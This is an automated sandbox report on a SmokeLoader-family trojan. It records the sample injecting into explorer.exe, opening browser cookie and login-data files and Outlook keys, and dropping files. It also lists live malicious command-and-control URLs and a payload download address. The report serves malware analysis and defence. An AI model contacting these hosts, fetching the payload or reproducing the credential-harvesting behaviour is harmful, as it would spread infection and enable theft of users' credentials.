                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4444, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.3E40.exe.560e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.dghchav.5e0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.3.dghchav.5f0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.3E40.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.3E40.exe.600000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.dghchav.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  2
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  3
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  Data Encrypted for Impact
                  CredentialsDomainsDefault Accounts12
                  Native API
                  Boot or Logon Initialization Scripts523
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  11
                  Input Capture
                  4
                  File and Directory Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution
                  Logon Script (Windows)Logon Script (Windows)2
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  2510
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  4
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts12
                  Command and Scripting Interpreter
                  Login HookLogin Hook1
                  Software Packing
                  NTDS881
                  Security Software Discovery
                  Distributed Component Object Model11
                  Input Capture
                  115
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets35
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  File Deletion
                  Cached Domain Credentials4
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job35
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt523
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Hidden Files and Directories
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525244 Sample: 9VgIkx4su0.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 53 nwgrus.ru 2->53 55 calvinandhalls.com 2->55 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 7 other signatures 2->75 10 9VgIkx4su0.exe 2->10         started        13 eihchav 2->13         started        15 dghchav 2->15         started        17 3 other processes 2->17 signatures3 process4 signatures5 117 Detected unpacking (changes PE section rights) 10->117 119 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->119 121 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->121 123 Switches to a custom stack to bypass stack traces 10->123 19 explorer.exe 98 9 10->19 injected 125 Antivirus detection for dropped file 13->125 127 Multi AV Scanner detection for dropped file 13->127 129 Machine Learning detection for dropped file 13->129 131 Maps a DLL or memory area into another process 15->131 133 Checks if the current machine is a virtual machine (disk enumeration) 15->133 135 Creates a thread in another existing process (thread injection) 15->135 process6 dnsIp7 57 187.131.253.169, 50028, 50030, 50032 UninetSAdeCVMX Mexico 19->57 59 nwgrus.ru 190.224.203.37, 49755, 49765, 49776 TelecomArgentinaSAAR Argentina 19->59 61 2 other IPs or domains 19->61 45 C:\Users\user\AppData\Roaming\eihchav, PE32 19->45 dropped 47 C:\Users\user\AppData\Roaming\dghchav, PE32 19->47 dropped 49 C:\Users\user\AppData\Local\Temp\FDDB.exe, PE32+ 19->49 dropped 51 2 other malicious files 19->51 dropped 83 System process connects to network (likely due to code injection or exploit) 19->83 85 Benign windows process drops PE files 19->85 87 Injects code into the Windows Explorer (explorer.exe) 19->87 89 3 other signatures 19->89 24 FDDB.exe 2 19->24         started        27 3E40.exe 19->27         started        29 explorer.exe 20 19->29         started        31 5 other processes 19->31 file8 signatures9 process10 signatures11 91 Multi AV Scanner detection for dropped file 24->91 93 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->93 95 Machine Learning detection for dropped file 24->95 97 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 24->97 33 cmd.exe 1 24->33         started        99 Antivirus detection for dropped file 27->99 101 Detected unpacking (changes PE section rights) 27->101 103 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 27->103 115 5 other signatures 27->115 105 System process connects to network (likely due to code injection or exploit) 29->105 107 Found evasive API chain (may stop execution after checking mutex) 29->107 109 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->109 111 Tries to steal Mail credentials (via file / registry access) 29->111 113 Tries to harvest and steal browser information (history, passwords, etc) 31->113 process12 signatures13 63 Uses netsh to modify the Windows network and firewall settings 33->63 65 Uses ipconfig to lookup or modify the Windows network settings 33->65 67 Modifies the windows firewall 33->67 36 WMIC.exe 1 33->36         started        39 systeminfo.exe 33->39         started        41 conhost.exe 33->41         started        43 17 other processes 33->43 process14 signatures15 77 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 36->77 79 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 36->79 81 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 36->81

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  9VgIkx4su0.exe34%ReversingLabs
                  9VgIkx4su0.exe100%AviraHEUR/AGEN.1310247
                  9VgIkx4su0.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\dghchav100%AviraHEUR/AGEN.1310247
                  C:\Users\user\AppData\Local\Temp\3E40.exe100%AviraHEUR/AGEN.1310247
                  C:\Users\user\AppData\Roaming\eihchav100%AviraHEUR/AGEN.1310247
                  C:\Users\user\AppData\Roaming\dghchav100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\FDDB.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\3E40.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\eihchav100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\FDDB.exe55%ReversingLabsWin64.Trojan.Generic
                  C:\Users\user\AppData\Roaming\eihchav34%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  https://powerpoint.office.comcember0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://excel.office.com0%URL Reputationsafe
                  http://schemas.micro0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://outlook.com0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://android.notify.windows.com/iOS0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
                  https://api.msn.com/0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  calvinandhalls.com
                  23.145.40.162
                  truetrue
                    unknown
                    bg.microsoft.map.fastly.net
                    199.232.210.172
                    truefalse
                      unknown
                      s-part-0017.t-0009.t-msedge.net
                      13.107.246.45
                      truefalse
                        unknown
                        nwgrus.ru
                        190.224.203.37
                        truetrue
                          unknown
                          fp2e7a.wpc.phicdn.net
                          192.229.221.95
                          truefalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://23.145.40.164/ksa9104.exetrue
                              unknown
                              http://unicea.ws/tmp/index.phptrue
                                unknown
                                http://nwgrus.ru/tmp/index.phptrue
                                  unknown
                                  https://calvinandhalls.com/search.phptrue
                                    unknown
                                    http://tech-servers.in.net/tmp/index.phptrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://calvinandhalls.com/explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003059000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://calvinandhalls.com/earch.phpexplorer.exe, 0000000A.00000002.3153296640.000000000302B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://word.office.comonexplorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2098614034.000000000C8D3000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              https://duckduckgo.com/chrome_newtabexplorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://duckduckgo.com/ac/?q=explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drfalse
                                                  unknown
                                                  https://calvinandhalls.com/search.phpMozilla/5.0explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3103492810.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4488375933.0000000000657000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4487737698.0000000000939000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4487808620.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4487806601.0000000001419000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.2097959116.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://excel.office.comexplorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.microexplorer.exe, 00000002.00000000.2094847936.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2094289006.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2094815551.0000000008870000.00000002.00000001.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.ecosia.org/newtab/explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.comexplorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://ac.ecosia.org/autocomplete?q=explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://calvinandhalls.com/search.php8explorer.exe, 0000000A.00000002.3153296640.0000000003000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://calvinandhalls.com/;explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2097959116.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.msn.com/explorer.exe, 00000002.00000000.2095504231.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crl.vexplorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://wns.windows.com/)sexplorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            187.131.253.169
                                                            unknownMexico
                                                            8151UninetSAdeCVMXtrue
                                                            190.224.203.37
                                                            nwgrus.ruArgentina
                                                            7303TelecomArgentinaSAARtrue
                                                            23.145.40.164
                                                            unknownReserved
                                                            22631SURFAIRWIRELESS-IN-01UStrue
                                                            23.145.40.162
                                                            calvinandhalls.comReserved
                                                            22631SURFAIRWIRELESS-IN-01UStrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1525244
                                                            Start date and time:2024-10-03 23:26:08 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 12m 37s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:39
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:9VgIkx4su0.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:5d99d66ef42ec43af05b9304aebefdb6.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@63/15@7/4
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 97%
                                                            • Number of executed functions: 143
                                                            • Number of non-executed functions: 132
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                            • Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.190.159.68, 20.190.159.0, 40.126.31.67, 40.126.31.71, 20.190.159.64, 20.190.159.75, 40.126.31.73, 20.190.159.4
                                                            • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: 9VgIkx4su0.exe
                                                            TimeTypeDescription
                                                            17:27:16API Interceptor324207x Sleep call for process: explorer.exe modified
                                                            17:28:44API Interceptor14x Sleep call for process: WMIC.exe modified
                                                            23:27:22Task SchedulerRun new task: Firefox Default Browser Agent 210CAF631C6B44AB path: C:\Users\user\AppData\Roaming\eihchav
                                                            23:28:25Task SchedulerRun new task: Firefox Default Browser Agent 969FBE99DA30A371 path: C:\Users\user\AppData\Roaming\dghchav
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            187.131.253.169aZPm0tHPTX.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • nwgrus.ru/tmp/index.php
                                                            k8JAXb3Lhs.exeGet hashmaliciousSmokeLoaderBrowse
                                                            • nwgrus.ru/tmp/index.php
                                                            190.224.203.373441TYcdND.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                            • 100xmargin.com/tmp/index.php
                                                            file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                                            • gebeus.ru/tmp/index.php
                                                            XQpBmNRd7j.exeGet hashmaliciousDjvuBrowse
                                                            • cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
                                                            file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                                            • sajdfue.com/files/1/build3.exe
                                                            IzXkxsTrEt.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                            • sajdfue.com/files/1/build3.exe
                                                            dmDeFvntUL.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                                            • sajdfue.com/files/1/build3.exe
                                                            CgoegMEw8J.exeGet hashmaliciousLummaC, Babuk, Djvu, Glupteba, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                                            • sdfjhuz.com/dl/build2.exe
                                                            7vMi37TpMO.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                            • trmpc.com/check/index.php
                                                            ENEDGCErLu.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, SystemBCBrowse
                                                            • trmpc.com/check/index.php
                                                            F7uYlkAOh8.exeGet hashmaliciousLummaC, Glupteba, Raccoon Stealer v2, SmokeLoader, StealcBrowse
                                                            • emgvod.com/emd/1.jpg
                                                            23.145.40.164veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                              v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                                                0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                  qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    aZPm0tHPTX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                        OCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                          file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                              KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                nwgrus.ruveEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                • 58.151.148.90
                                                                                v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                • 190.219.117.240
                                                                                0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                • 189.61.54.32
                                                                                qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                • 181.52.122.51
                                                                                aZPm0tHPTX.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                • 187.131.253.169
                                                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                • 196.189.156.245
                                                                                k8JAXb3Lhs.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                • 78.89.199.216
                                                                                OCYe9qcxiM.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                • 187.228.112.175
                                                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                • 190.249.193.233
                                                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                • 210.182.29.70
                                                                                s-part-0017.t-0009.t-msedge.nethttps://account.attributes.best/communication.aspx?now=yikes.bikes@saic.comGet hashmaliciousUnknownBrowse
                                                                                • 13.107.246.45
                                                                                https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3MGet hashmaliciousUnknownBrowse
                                                                                • 13.107.246.45
                                                                                ORA _ Morningstar DBRS.htmlGet hashmaliciousUnknownBrowse
                                                                                • 13.107.246.45
                                                                                https://www.ccjm.org/highwire_log/share/mendeley?link=https://onpro.infoGet hashmaliciousUnknownBrowse
                                                                                • 13.107.246.45
                                                                                https://auth-owlting.com/enterprise/core.jsGet hashmaliciousUnknownBrowse
                                                                                • 13.107.246.45
